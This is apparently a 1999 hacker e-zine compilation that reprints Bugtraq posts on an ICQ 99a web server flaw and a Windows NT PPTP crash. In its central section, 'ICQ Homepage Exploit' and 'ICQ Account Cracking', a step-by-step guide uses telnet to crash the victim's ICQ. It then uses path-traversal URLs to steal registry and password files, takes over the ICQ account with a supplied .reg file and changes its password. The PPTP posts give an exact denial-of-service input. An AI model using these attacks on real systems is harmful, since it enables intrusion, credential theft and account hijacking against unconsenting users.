>I try to test this on my NT box ( NT server 4.00.1381, Sevice pack 3 ) and I
>could not reproduce the error. I've used ICQ Version 99a Beta v.2.13 Build
>1700. It would be beneficial if Ron Jarrell or Jan Vogelgesang, explained
>the procedure that they carried out to arrive to the error detailedly.
>
>Best regards, Jose.
I tested it against my own win98 box with IE5 final (english) result: I was
vulnerable.
My friend with win98 and ie4 (french) result: vulnerable
An other friend with win98 and IE5 (french) result: vulnerable
we were all using ICQ99a build 1700
Method used:
telnet to port 80
send: QUIT <LF>
it disconnects after 5 to 10 seconds.
,
|
| Kaven Rousseau
| rousseau@globetrotter.qc.ca
| FingerPrint: F1C8 F915 9F0F DD5E DACB 024B 5C6F 163D F097 40D6
`------------------- ---- -- -
-------------------------------------------------------------------------------
Date: Sat, 10 Apr 1999 20:45:56 +0200
From: Frank Dekervel <kervel@SVENNIEBOY.TERBANK.KOTNET.ORG>
To: BUGTRAQ@netspace.org
Subject: Re: ICQ Webserver bug
humm,
i d like to add one last thing to this according to me much too long
thread. (seems some writers ain't thinking about the cause)
if you have a look at the pseudocode below, which i suspect mirabilis to
use, you ll find thousands of ways to exploit icq.
fread(my_socket,"%s %s %s", getword, url, httpversion);
/// if you only feed two or one word, it 'dumps core', gpf under windoze
change the slashes in url to backslashes;
url = "c:\program files\icq\webroot_dir\" + url;
/// yes, this is the '../../../../' bug ...
open(fd,url);
read(fd,buffer);
write(socket,buffer);
close(socket);
i think its this because i made small webserver earlier to see common
bugs. i checked on the net, and the dynamic server of francois piete
(known for delphi components) and various shareware servers, or remote
admin modules for eg. proxy servers are vulnerable.
greetz,
kervel
(kervel@svennieboy.terbank.kotnet.org)
----------------------------------------------------------------------------
@HWA
12.1 ICQ Homepage Exploit
~~~~~~~~~~~~~~~~~~~~
ICQ Homepage Exploit
By Shadow51
Ever wondered why there is a little house beside the name of some people? That doesn't mean they are at home, it means
they have the ICQ-Webserver running. The idiots who made it left huge bugs in it, like you can close their ICQ remotely,
and even download their files. The only problem is that you can't see the files, so you have to know what you're
downloading.
To close the ICQ client:
1. Click on the start button
2. Click on RUN
3. Type Telnet 123.123.123.123 80 Of course replace the 123.123.123.123 by the IP of the victim (note that this bug
only works on build 1700 and maybe a few others but I'm not sure).
4. Press ENTER Wait until it connects
5. Type QUIT Wait about 10 seconds. If they go offline that means it worked, if not, then it didn't work. Now suppose
you want to get some of their files.
Lets say that you want to see the file c:\windows\win.ini, and he or she has the ICQ-Webserver on:
1. Go to your browser
2. Type http://123.123.123.123/.html/......../windows/win.ini
note that you need the /.html/ part. It will trick the server into believing it's a html file, and note that there are 8 dots
/......../ (that means it goes back 4 dirs if the users ICQ dir is not in a standard place. It can cause problems, but 95% of
the time it's in c:\progra~1\icq\
3. press ENTER in your browser
It will simply ask you where you want to save the file the you save it and do what ever you want with it. Now this is not all
you can do. There are much better things with this exploit, like getting the user's password files and registry. If you are a
lamer, I suggest you go and play with what you just learned, and stop reading now cause this is a bit too complicated for
you :P. Okay, so you want to have the registry and all the passes. Okay, before you do this, I warn you that if the user
your hacking is not using the same version of Windows you are using, you could end up with a lot of problems. Suppose
you have Win98, and they have win95, and it wont work. An easy way to make sure it's the same version is to download
their command.com with the exploit, and compare the size with your command.com. There are many other ways, but this
is a good one.
1. Get 2 files http://123.123.123.123/.html/......../windows/user.dat and
http://123.123.123.123/.html/......../windows/system.dat
Remember to change the IP when your done.
2. Copy them in a directory.
3. Make a backup copy of you c:\windows\user.dat and c:\windows\system.dat You're gonna want to have them back
when you're done.
4. Restart your computer
5. Press F8 just before it boots up
6. Choose "Command Prompt Only"
7. Delete your current user.dat and system.dat and replace them with the ones from the guy you hacked
8. Reboot your computer
9. Just before it boots, press F8 several times; choose safe mode.
10. Once booted in safe mode, click on start
11. Click on RUN
12. Type regedit
13. Press ENTER
14. Once in Regedit, click on the menu "Registry", then choose "Export Registry File..."
15. Save the file, then get yourself a Password Cracker
16. If all goes well, you now have all the users passwords.
It should look something like this:
crypt_Blizzard_Storm : A@N
www.mircosoft.com : Administration:PASSWORD
*Rna\Dan\dannyk : q34ad6gt
*Rna\Test\957935 : nar8s7yj
*Rna\Test2\wolves : cyal8r
*Rna\Test3\curtisph : q73vnrht
*Rna\My Connection\USERNAME : PASSWORD
*Rna\My Connection 3\USERNAME : PASSWORD
17. Reboot
18. Press F8 at startup
19. Choose "Command Prompt Only"
20. Replace user.dat and system.dat with your originals that you previously had backed up
Shadow51
29000000
Shadow51@writeme.com
-----------------------------------------------------------------------------------------------------------------------
ICQ Account Cracking
By Shadow51
A lot of people have been asking me how it would be possible to crack ICQ accounts. It's very easy, but unfortunately it
doesn't work every time. All you do is put in this:
1. Download the following files from the targeted users hard drive using the ICQ exploit:
(replace 123.123.123.123 by the guys IP and UIN by the guys ICQ #)
(note that there's 6 dots not 8)
http://123.123.123.123/.html/....../db/UIN.idx
http://123.123.123.123/.html/....../db/UIN.dat
http://123.123.123.123/.html/....../db/UINmsg.dat
http://123.123.123.123/.html/....../db/UINmsg.idx
http://123.123.123.123/.html/....../db/UINhis.idx
http://123.123.123.123/.html/....../db/UINhis.dat
2. Open Notepad and create a new document.
3. Copy this into it. (Replace all the HACKEDUIN by the UIN you're hacking)
(I got this registry key from http://i.am/devil)
REGEDIT4
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN]
"Name"="Hacked UIN"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs]
"Random Groups Version"=dword:0000000a
"Online Color"=dword:00ff0000
"Unlisted Color"=dword:00800000
"Offline Color"=dword:000000ff
"Authorize Color"=dword:00400080
"Notify Color"=dword:00800080
"LastStatus Color"=dword:00008000
"Default File Dir"="C:\\Program Files\\ICQ\\Received Files"
"SMTP Address"=""
"DND Message"="Please do not disturb me now. Disturb me later."
"Out Message"=""
"Busy Message"="User is occupied. Only urgent messages will be delivered."
"Chat Message"="I would like to chat about anything"
"Away PreNum"=dword:00000000
"Out PreNum"=dword:00000000
"Busy PreNum"=dword:00000000
"DND PreNum"=dword:00000000
"Chat PreNum"=dword:00000000
"File Options"=dword:00000004
"URL Options"=dword:00000004
"Chat Options"=dword:00000004
"All Options"=dword:0000000e
"EXT Options"=dword:00000004
"Startup"="No"
"Auto Away"="No"
"Auto Hide Time"=dword:0000001e
"Auto Hide"="No"
"Move Server Top"="No"
"Blink In Tray"="No"
"Sort Lists"="Yes"
"Show Online List"="No"
"Remove AddFriend"="Yes"
"Splash Open"="Yes"
"History Last First"="Yes"
"FloatTop"="Yes"
"Thru Server"="No"
"Join Chat"="No"
"Open URL Browser"="No"
"Refuse File NotInList"="No"
"Overwrite ExistFile"="No"
"Disable Online Alert"="Yes"
"Accept Urgent In Busy"="No"
"Blink Tray In AwayBusy"="Yes"
"Use Contact List Color"="No"
"Contact List Color"=dword:00c8b99d
"Save User File"="Yes"
"Auto Update"="Yes"
"Search Wizard"="No"
"Default Mailer"="Yes"
"Pop Play Sound"="Yes"
"Pop Auto Launch"="No"
"Pop Check"="No"
"Pop Time"=dword:0000000a
"Check Headers"="Yes"
"MoveToOutDelay"=dword:00000014
"MoveToOut"="No"
"MoveToAwayDelay"=dword:0000000a
"MoveToAway"="No"
"Auto Sleep Mode"="No"
"Log History Events"="Yes"
"Connection Type"="Permanent"
"Firewall"="Yes"
"UseGivenIP"="No"
"Socks"="No"
"SocksPort"=dword:00000438
"SocksServer"="Enter your socks server"
"ProxySocks4Host"="Enter your proxy server"
"ProxySocks4Port"=dword:00000438
"UseProxySocks4"="No"
"GiveStats"="No"
"SocksVersion"=dword:00000004
"SocksAuthentication"=dword:00000000
"FirewallTimeout"=dword:0000001e
"UseFirewallTimeout"="No"
"UseFirewallRangePorts"="Yes"
"FirewallFromPort"=dword:000059d8
"FirewallToPort"=dword:00007148
"Old Sockets"="No"
"UserType"=dword:00000000
"Mail Receipients"=";"
"Random Available"="No"
"RandomGroupName"=dword:00000001
"Random Name"="#�d�� 666 �["
"Allow Secure Clients Only"="Yes"
"PhoneApproval"="Yes"
"PhoneToneTime"=dword:00000032
"PhonePauseTime"=dword:000001f4
"PhoneBreakTime"=dword:00000028
"PhoneSettings"=dword:00000001
"PhonePauseChar"=","
"PhoneLocalP"=" "
"PhoneLongP"=" "
"PhoneInterP"=" "
"Chat RoomName"="Product Support / Suggestion"
"Auto Join Chat Room"="Yes"
"Novice Counter"=dword:0000000a
"Menu Counter"=dword:00000013
"Servers Version"=dword:00000001
"Externals Version"=dword:00000019
"Stats"=hex:60,ff,ea,52,5c,36,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"Novice"="No"
"Dropped Users"=hex:01,00,00,00,43,ca,35,00,e6,02,1f,00
"State Flags"=dword:00000000
"Server Msg Version"=dword:0000000b
"Server Msg Shown"=dword:00000001
"Server Msg Count"=dword:00000009
"LeftButton Warning"="No"
"Menu Left Click"="No"
"Tip Startup"="No"
"Tip Position"=dword:00000000
"MoreEvents Warning"="No"
"Invisible Warning"="No"
"Send Later Warning Off"="No"
"Busy Warning"="No"
"Away Warning"="No"
"DND Warning"="No"
"FT Warning"="No"
"Ext Warning"="No"
"Out Warning"="No"
"Chat Warning"="No"
"Away Message"="User is currently away\r\nYou can leave him/her a message"
"Random Comment"="You won't be hurt by things you don't care.\r\n\r\n(c) Calvin's Labs, 1993-1998. No Rights
Reserved.\r\nIt's not a secret. It's not a magic. It's not a myth."
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\YOURUIN\Prefs\Presets]
"OutMsg Presets 0"="I'm out'a here. See you tomorrow!"
"DNDMsg Presets 0"="Please do not disturb me now. Disturb me later."
"Away PresetsMsg 0"="Away"
"Out PresetsMsg 0"="Out for the day"
"Busy PresetsMsg 0"="Busy"
"DND PresetsMsg 0"="DND"
"Chat PresetsMsg 0"="Chat"
"AwayMsg Presets 1"="I am out to lunch. I will return shortly."
"OutMsg Presets 1"=""
"DNDMsg Presets 1"="I am currently in a meeting. I can't be disturbed."
"ChatMsg Presets 1"="Come Join my chat room!"
"Away PresetsMsg 1"="Lunch"
"Out PresetsMsg 1"="Not here"
"Busy PresetsMsg 1"="Meeting"
"DND PresetsMsg 1"="Meeting"
"Chat PresetsMsg 1"="Come In"
"AwayMsg Presets 2"="Don't go anywhere! I'll be back in a jiffy!"
"OutMsg Presets 2"="I'm closed for the weekend/holidays."
"DNDMsg Presets 2"="Don't disturb my concentration!"
"ChatMsg Presets 2"="Don't miss out on the fun! Join our chat!"
"Away PresetsMsg 2"="Be right back"
"Out PresetsMsg 2"="Closed"
"Busy PresetsMsg 2"="Concentration"
"DND PresetsMsg 2"="Concentration"
"Chat PresetsMsg 2"="Fun"
"AwayMsg Presets 3"="I'm out with the dog. Be back when he's finished."
"OutMsg Presets 3"="Gone fishin'."
"DNDMsg Presets 3"="I'm on the phone with a very important client. Don't disturb me!"
"ChatMsg Presets 3"="What are you waiting for? Come on in!"
"Away PresetsMsg 3"="Dog Walk"
"Out PresetsMsg 3"="Fishing"
"Busy PresetsMsg 3"="On the Phone"
"DND PresetsMsg 3"="On the Phone"
"Chat PresetsMsg 3"="Don't Wait"
"AwayMsg Presets 4"="Went out for a smoke. "
"OutMsg Presets 4"="I'm sleeping. Don't wake me."
"DNDMsg Presets 4"="I can't chat with you now. I'm busy."
"ChatMsg Presets 4"="We'd love to hear what you have to say. Join our chat."
"Away PresetsMsg 4"="Smoke"
"Out PresetsMsg 4"="Sleeping"
"Busy PresetsMsg 4"="Can't chat "
"DND PresetsMsg 4"="Can't chat "
"Chat PresetsMsg 4"="Hear"
"AwayMsg Presets 5"="On my Coffee break."
"OutMsg Presets 5"="Went home. Had to feed the kids."
"DNDMsg Presets 5"="Can't you see I'm working?"
"ChatMsg Presets 5"="Enter your chat room message here"
"Away PresetsMsg 5"="Coffee"
"Out PresetsMsg 5"="Kids"
"Busy PresetsMsg 5"="Working"
"DND PresetsMsg 5"="Working"
"Chat PresetsMsg 5"="Empty"
"AwayMsg Presets 6"="Went to get some fresh air."
"OutMsg Presets 6"="Gone for good."
"DNDMsg Presets 6"="Enter your occupied message here"
"ChatMsg Presets 6"="Enter your chat room message here"
"Away PresetsMsg 6"="Air"
"Out PresetsMsg 6"="Gone"
"Busy PresetsMsg 6"="Conversing"
"DND PresetsMsg 6"="Empty"
"Chat PresetsMsg 6"="Empty"
"BusyMsg Presets 7"="User is occupied. Only urgent messages will be delivered."
"DNDMsg Presets 7"="Enter your occupied message here"
"ChatMsg Presets 7"="Enter your chat room message here"
"Away PresetsMsg 7"="Empty"
"Out PresetsMsg 7"="Empty"
"Busy PresetsMsg 7"="Empty"
"DND PresetsMsg 7"="Empty"
"Chat PresetsMsg 7"="Empty"
"BusyMsg Presets 0"="User is currently Occupied"
"ChatMsg Presets 0"="I would like to chat about anything"
"BusyMsg Presets 1"="User is currently Occupied1"
"BusyMsg Presets 2"="User is currently Occupied2"
"BusyMsg Presets 3"="User is currently Occupied"
"BusyMsg Presets 4"="User is currently Occupied"
"BusyMsg Presets 5"="User is currently Occupied"
"BusyMsg Presets 6"="User is currently Occupied"
"AwayMsg Presets 7"="User is currently away"
"OutMsg Presets 7"="User is currently N/A"
"AwayMsg Presets 0"="User is currently away\r\nYou can leave him/her a message"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD]
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message0]
"Message"="Please bookmark our network status page."
"URLName"="http://www.mirabilis.com/status.html"
"URL"="press here"
"Date"=""
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message1]
"URLName"="http://www.mirabilis.com/emailsig.html"
"URL"="Go to the ICQ e-mail signature generator"
"Date"=""
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message2]
"Message"="ICQ is doing it again! One more new service from ICQ for your pleasure! Create your ICQ interest group -
home, work, family, hobby, affiliation, sports, music...etc..( It's straight forward, no HTML needed! )"
"URLName"="http://www.icq.com/announcements/02.html"
"URL"="It's fun and easy, GO!!"
"Date"="31-MAR-98"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message3]
"URLName"="http://www.icq.com/announcements/whitepages.html"
"URL"="Go!"
"Date"="1-APR-98"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message4]
"Message"="ICQ can notify you when you receive an e-mail and show you the e-mail headers! Learn how to do it!"
"URLName"="http://www.mirabilis.com/email.html"
"URL"="E-mail notification instructions"
"Date"="15-JUN-98"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message5]
"URLName"="http://www.icq.com/announcements/05.html"
"URL"="Create your Greeting"
"Date"="12-JUL-98"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message6]
"URLName"="http://www.icq.com/announcements/06.html"
"URL"="Click For More Information"
"Date"="26-AUG-98"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message7]
"Message"="ICQ can alert you when you receive Emails and show you the Email headers!"
"URLName"="http://www.icq.com/announcements/07.html"
"URL"="Learn how to do it"
"Date"="06-SEPT-98"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message8]
"URLName"="http://www.icq.com/announcements/06.html"
"URL"="Click For More Information"
"Date"="20-OCT-98"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups]
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup1]
"Name"="General Chat"
"Number"=dword:00000001
"Version"=dword:00000001
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup2]
"Name"="Romance"
"Number"=dword:00000002
"Version"=dword:00000002
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup3]
"Name"="Games"
"Number"=dword:00000003
"Version"=dword:00000003
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup4]
"Name"="Students"
"Number"=dword:00000004
"Version"=dword:00000004
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup5]
"Name"="20 Something"
"Number"=dword:00000006
"Version"=dword:00000006
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup6]
"Name"="30 Something"
"Number"=dword:00000007
"Version"=dword:00000007
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup7]
"Name"="40 Something"
"Number"=dword:00000008
"Version"=dword:00000008
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup8]
"Name"="50 Plus"
"Number"=dword:00000009
"Version"=dword:00000009
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Servers]
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Servers\Server1]
"Host"="icq1.mirabilis.com"
"Port"=dword:00000fa0
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals]
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Canasta]
"Type"="Command"
"Command Line"="/ip:"
"Path"="C:\\Program Files\\Canasta\\Canasta.exe"
"URL"="http://ourworld.compuserve.com/homepages/mharte"
"Version"=dword:0000000f
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Connectix VideoPhone]
"Type"="Extension"
"Format"="/p:tcp /ac:"
"Extension"="cvp"
"URL"="http://www.connectix.com/html/videophone.html"
"Version"=dword:00000009
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Cu-Seeme]
"Type"="Command"
"Command Line"=""
"Path"="C:\\CUSEEME\\CUSEEM32.EXE"
"URL"="http://www.cu-seeme.com/"
"Version"=dword:00000006
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\IRIS Phone]
"Type"="Extension"
"Format"=""
"Extension"="iru"
"URL"="http://irisphone.com/"
"Version"=dword:0000000a
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Microsoft VChat]
"Type"="ServerExtension"
"Format"="1.1\\n-u 1 -a "
"Extension"="vce"
"NumParameters"=dword:00000002
"Server1"="vchat1.microsoft.com"
"URL"="http://vchat1.microsoft.com"
"Version"=dword:00000011
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Microsoft VChat\Param1]
"ParamName"="World"
"CanOtherChange"="No"
"Param1"="#Compass"
"Param2"="#BugWorld"
"Param3"="#Fishbowl"
"Param4"="#Lodge"
"Param5"="#Lunar"
"Param6"="#Lodge"
"Param7"="#Practice"
"Param8"="#RedDen"
"Param9"="#TableTop"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Microsoft VChat\Param2]
"ParamName"="Avatar"
"CanOtherChange"="Yes"
"Param1"="Amani"
"Param2"="Anderson"
"Param3"="Brb"
"Param4"="Cat"
"Param5"="Crab"
"Param6"="Dancer"
"Param7"="Dred"
"Param8"="Duggan"
"Param9"="Joey"
"Param10"="Lulu"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Netscape CoolTalk]
"Type"="Command"
"Command Line"=""
"Path"="C:\\Program Files\\Netscape\\Navigator\\CoolTalk\\CoolTalk.EXE"
"URL"="http://home.netscape.com/comprod/products/navigator/version_3.0/communication/cooltalk/index.html"
"Version"=dword:00000004
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Rikken on the Rockx]
"Type"="ClientServer"
"Client Command Line"="/CLIENT %i"
"Server Command Line"="/SERVER"
"Client Path"="C:\\Rikken\\Rikken.exe"
"Server Path"="C:\\Rikken\\Rikken.exe"
"URL"="http://www.dse.nl/~ramon/rikken/"
"Version"=dword:00000017
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VDOPhone]
"Type"="Extension"
"Format"="callto://"
"Extension"="vdp"
"URL"="http://www.vdo.net/download/"
"Version"=dword:00000003
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VidCall]
"Type"="Command"
"Command Line"=""
"Path"="C:\\VidCall\\Corp.EXE"
"URL"="http://www.access.digex.net/~vidcall/vidcall.html"
"Version"=dword:00000008
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\WebPhone]
"Type"="Extension"
"Format"=""
"Extension"="wpc"
"URL"="http://www.webphone.com/"
"Version"=dword:00000007
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Quake]
"Type"="ClientServer"
"Client Command Line"="-mpath +connect %i"
"Server Command Line"="-mpath -listen"
"Client Path"="c:\\quake_sw\\Q95.bat"
"Server Path"="c:\\quake_sw\\Q95.bat"
"Server1"="quake.xmisson.com"
"URL"="http://www.idsoftware.com"
"Version"=dword:00000010
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VoxChat]
"Type"="ServerCommand"
"Format"="GROUPNAME=i PORT=15000"
"Path"="C:\\Program Files\\VoxChat\\VoxChat.exe"
"NumParameters"=dword:00000001
"Server1"="voxchat1.voxware.com"
"Server2"="voxcha2.voxware.com"
"URL"="http://www.voxchat.com/low/download.htm"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VoxChat\Param1]
"ParamName"="Room"
"CanOtherChange"="No"
"Param1"="#ICQ"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\PhoneLocations]
"LastUpdate"=dword:00000000
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Main]
"SelectedCell"=dword:00000000
"AlwaysOnTop"="Yes"
"LeftBarWidth"=dword:000000ad
"RightBarWidth"=dword:000000ad
"FloatBar-Left"=dword:00000255
"FloatBar-Right"=dword:00000307
"FloatBar-Top"=dword:00000033
"FloatBar-Bottom"=dword:000001f3
"State"="Floating"
"Minimized"="No"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Windows]
"Response"=dword:008f00c9
"SearchWiz"=dword:006f00c0
"NotifyWiz"=dword:006f00c0
"posNovice"=dword:009300dc
"posMOTD"=dword:00af00b7
"posMenuConfig"=dword:00a900e7
"RemoveUIN"=dword:00bb0108
"Message"=dword:008b004f
"Security"=dword:007400b4
"Prefs"=dword:007f00ae
"History"=dword:0096003a
"File Request"=dword:009000f0
"FileTransfer"=dword:009700ae
"Info"=dword:009300d2
"FetchUser"=dword:00e9010e
"URL Message"=dword:00a00069
"Away"=dword:00bd00f7
"Chat Request"=dword:009f00dd
"Contacts List"=dword:008300bd
"Chat"=dword:008b00f5
"Phone"=dword:000a000a
"Phone Call Request"=dword:007700e5
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Search]
"Place"=dword:00a400cc
"Type"=dword:00000002
"Width"=dword:01880188
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\ICQ Chat]
"ChatStyle Counter"=dword:00000003
"Pen Color"=dword:0080ffff
"Back Color"=dword:00004000
"Send Focus"="Yes"
"Enable Sounds"="Yes"
"Name Bars"="Yes"
"Always On Top"="No"
"AutoColor"="No"
"OverRide Format"="Yes"
"Show Toolbar"="Yes"
"State"=dword:00010000
"New Font Name"="Times New Roman"
"Char Set"=dword:00000000
"IRCListWidth"=dword:00000006
"Font Pitch"=dword:00000012
"New Font Height"=dword:0000000e
"Font Effects"=dword:00000000
"AutoColor 0"=dword:00000000
"AutoColor 1"=dword:00000080
"AutoColor 2"=dword:00008000
"AutoColor 3"=dword:00008080
"AutoColor 4"=dword:00800000
"AutoColor 5"=dword:00800080
"AutoColor 6"=dword:00808000
"AutoColor 7"=dword:00808080
"AutoColor 8"=dword:00c0c0c0
"AutoColor 9"=dword:000000ff
"AutoColor 10"=dword:0000ff00
"AutoColor 11"=dword:0000ffff
"AutoColor 12"=dword:00ff0000
"AutoColor 13"=dword:00ff00ff
"AutoColor 14"=dword:00ffff00
"AutoColor 15"=dword:00ffffff
"Place-Left"=dword:0000000a
"Place-Right"=dword:000001fe
"Place-Top"=dword:0000000a
"Place-Bottom"=dword:0000021a
"New LogFile name"="ICQChatLog.txt"
"New SaveFile name"="ICQChatSave.txt"
4. Save the file as HACKEDICQ.REG
5. If you have ICQ open, close it.
6. Copy all the files you got earlier (the idx and dat files) into your ICQ\DB directory
ex: c:\progra~1\ICQ\db
7. Open the HACKEDICQ.REG file
8. When it asks if you would like to add this to your registry, click YES.
9. Open the DB convert program in your ICQ directory (It comes with ICQ99), then click on "Convert a old DB"
10. When it's done converting, close the DB converter. It should start ICQ automatically, but if it doesn't, open it
manually.
11. If ICQ doesn't already start in the Hacked UIN, click on the ICQ menu, click on "Add/Change Current User", then
click on "Change the Active User". Choose Hacked UIN. If it asks for the password, there's 2 things that may have
happened:
I. They have the protection set on high. The only way of getting past the protection is to download the ICQ CRACK.
II. They are sill online. The only thing you can do is wait until they go offline.
12. Once you are successfully in the users ICQ, quickly change the users password. Once this is complete, you will be in
total control over the users ICQ account. Mission success.
ICQ Exploit Tips
-----------------
Remember in the last text I wrote? I told you to download the command.com. There's a better way to find out the
Windows version, and more info with it, too. Get the file http://123.123.123.123/.html/......../msdos.sys.
I saw in the original ICQ Exploit text that the HTTP server Exploit doesn't work on NT, so i went in NT and i tested it.
The result was system wasn't exploitable. Hence, if you are running NT, and you want to use the HTTP server; it's 100%
safe for you to do so.
Shadow51
29000000
Shadow51@hackcity.com
@HWA
13.0 Possible DoS in WinNT RAS (PPTP)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Possible DOS in WinNT RAS (PPTP)
Simon Helson (simon@CONCEPTS.CO.NZ)
Tue, 27 Apr 1999 09:29:06 -0700
Please excuse if this has been posted before, I did a quick search of the
archives and found nothing
This hasn't been sent to MS, as I don't know an email address to send it
to, Aleph, if you find it worthy of sending, please forward a copy to the
MS people for their attention. Cheers.
I was playing around with PPTP last night, and discovered that, with "very"
minimal effort, I could cause my friends NT Server (version 4, service pack
4) to reboot instantly, without shutting down. All I did was telnet to the
port (1723) on the NT box, and then send the following data.
hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
hhhhhhhhhhhhhhhhhhhhhhhhhhhh (that's 256 'h's for those who don't want to
count :-)
and hit return. nothing. BUT, then I hit ^D and all hell broke loose. The
NT server dropped like a stone, full hardware reboot.
I tested this multiple times and always got the same response.
The NT Server was version 4, with Service pack 4 applied.
Cheers
Simon
------------------------------------------------------------------------------
Date: Tue, 27 Apr 1999 20:55:50 -0700
From: Simon Helson <simon@CONCEPTS.CO.NZ>
To: BUGTRAQ@netspace.org
Subject: RE Possible DOS in WinNT RAS (PPTP)
Hello again.
please excuse the lack of detail in my first posting. I was trying to
recollect the events of the past evening.
Unfortunately I don't have unlimited access to a NT server to play with.
However, I have tried this again (on the same server) this time over the
internet as opposed to a LAN. (trying to remove the NIC from the equation.)
Firstly, the NT setup:
NT Server Version 4, with Service Pack 4.0 applied.
(outside US version - only 40 bit)
PPTP added as a network device
Number of VPNs available - 2
then RAS service started.
The attack box setup:
RedHat Linux 5.2 running kernel 2.2.1
modem connection to the net
The procedure I followed:
[root@blobby /root]# telnet <removed for privacy> 1723
Trying <removed for privacy>...
Connected to <removed for privacy>.
Escape character is '^]'
hhhhhhhhhhhhhhh<type 256 times>
^d (not shown in output)
^]
